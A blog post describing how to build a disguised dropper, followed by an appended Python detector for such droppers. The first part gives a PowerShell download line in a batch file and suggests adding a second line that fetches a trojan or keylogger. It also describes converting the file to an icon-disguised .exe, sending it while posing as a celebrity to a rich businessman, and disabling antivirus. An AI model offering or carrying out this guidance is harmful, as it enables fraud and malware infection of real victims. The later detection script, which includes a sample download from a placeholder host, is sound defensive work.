Friday, July 22, 2022

A Basic Backdoor Creation Technique

Hackers do find clever ways to evade detection. There are a number of ways to do this. For example, in the latest news, a hacker was able to steal money from Axie by inserting a trojan into a PDF file that supposedly contained a job offer. The employee was approached while at work and, after a series of online interviews, the recruiter told him they were willing to hire him and sent him the PDF job offer document. The employee downloaded the file at his workstation and opened it, and the hacker gained access to the company's network infrastructure, resulting in a multi-million dollar heist.

Today I will recreate how the hacker did this in its most basic way. Always remember that this is for educational purposes only. DO NOT use this for any illegal purposes.

Create a batch file with the following commands:

REM Download the image and save it under c:\TEMP
PowerShell -Command "Invoke-WebRequest 'https://web.com/image.JPG' -OutFile c:\TEMP\matrix.png"

REM Open the downloaded image with its default viewer
c:\TEMP\matrix.png

The above command is an instruction to download an image and save it at c:\temp. Since it is a batch file, you can add another line that is identical to the first, but instead of an image you specify a program that contains malicious code, such as a trojan (a gate opener that creates a backdoor), a keylogger, a virus, etc.

The .bat file is already executable, but it is still very obvious, so you need to disguise it as an image. The scenario is that you are impersonating a celebrity and chatting with a rich businessman; when you are asked to send your photo, you need it to appear in the chat room as an image, and of course you cannot send it as a .bat file. So to disguise the application, you convert it into an executable file. You may use a bat-to-exe converter and assign an icon to the .exe file, resulting in a disguised image in the chat room.


Once the file is downloaded and opened, the image is shown and, at the same time, the other application is downloaded and executed.

You will need to disable your antivirus while doing this experiment.
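From the defender's side, the dropper described above has two traits that are easy to check for: a batch script that downloads files with PowerShell and then opens or runs what it fetched, and an "image" attachment whose content is really a Windows executable (the icon and file name can be faked, the MZ header cannot). The following Python script is an added example written for this post, not code from the original article. The sample batch text reuses the post's own two lines plus a constructed second download from the placeholder host example.invalid; the file names photo.png and photo.exe and their contents are also constructed.

```python
import re
from pathlib import PureWindowsPath

# Matches a PowerShell download cradle of the form used in the post:
#   Invoke-WebRequest [-Uri] '<url>' ... -OutFile <path>
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest\s+(?:-Uri\s+)?['\"]?(?P<url>https?://[^\s'\"]+)['\"]?"
    r"[^\n]*?-OutFile\s+['\"]?(?P<path>[^\s'\"]+)",
    re.IGNORECASE,
)

IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
EXECUTABLE_EXTS = {".exe", ".bat", ".cmd", ".scr", ".com"}

# Constructed sample: the post's batch file plus a second download line and
# the lines that open/run the downloaded files. example.invalid is a placeholder.
SAMPLE_BAT = r"""PowerShell -Command "Invoke-WebRequest 'https://web.com/image.JPG' -OutFile c:\TEMP\matrix.png"
PowerShell -Command "Invoke-WebRequest 'https://example.invalid/update.exe' -OutFile c:\TEMP\update.exe"

c:\TEMP\matrix.png
c:\TEMP\update.exe
"""


def find_download_cradles(script_text):
    """Return (url, output_path) for every PowerShell download line in a batch script."""
    return [(m.group("url"), m.group("path")) for m in DOWNLOAD_RE.finditer(script_text)]


def downloaded_paths_invoked(script_text):
    """Return the downloaded output paths that the script later opens or runs,
    either as a bare command line or via 'start'/'call'."""
    lines = [ln.strip().lower() for ln in script_text.splitlines() if ln.strip()]
    invoked = []
    for _url, path in find_download_cradles(script_text):
        p = path.lower()
        for ln in lines:
            tokens = ln.split()
            if ln == p or (tokens and tokens[0] in ("start", "call") and tokens[-1] == p):
                invoked.append(path)
                break
    return invoked


def assess_batch(script_text):
    """Human-readable findings for a batch script: what it downloads and what it runs."""
    findings = [f"downloads {url} to {path}" for url, path in find_download_cradles(script_text)]
    findings += [f"opens or runs the downloaded file {p}" for p in downloaded_paths_invoked(script_text)]
    return findings


def content_type(data):
    """Classify a file by its leading bytes, ignoring name, extension and icon."""
    if data.startswith(b"MZ"):
        return "pe-executable"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    return "unknown"


def assess_attachment(name, data):
    """Findings for a file received where an image was expected (chat, e-mail)."""
    ext = PureWindowsPath(name).suffix.lower()
    kind = content_type(data)
    findings = []
    if kind == "pe-executable":
        findings.append("content is a Windows executable (MZ header)")
        if ext in IMAGE_EXTS:
            findings.append(f"extension {ext} claims an image but the content is executable")
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable extension {ext} where an image was expected")
    return findings


if __name__ == "__main__":
    for line in assess_batch(SAMPLE_BAT):
        print("batch:", line)
    for name, data in [("photo.png", b"MZ" + bytes(62)), ("photo.exe", b"MZ" + bytes(62))]:
        for line in assess_attachment(name, data):
            print(f"{name}:", line)
```

The magic-byte check is deliberately independent of the file name: a bat-to-exe output with a picture icon still begins with MZ, so a gateway or endpoint script that refuses MZ content in "image" attachments catches the disguise regardless of how convincing the icon is. The script scan flags the pairing the post relies on, a download followed by execution of the downloaded path, rather than either half alone.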

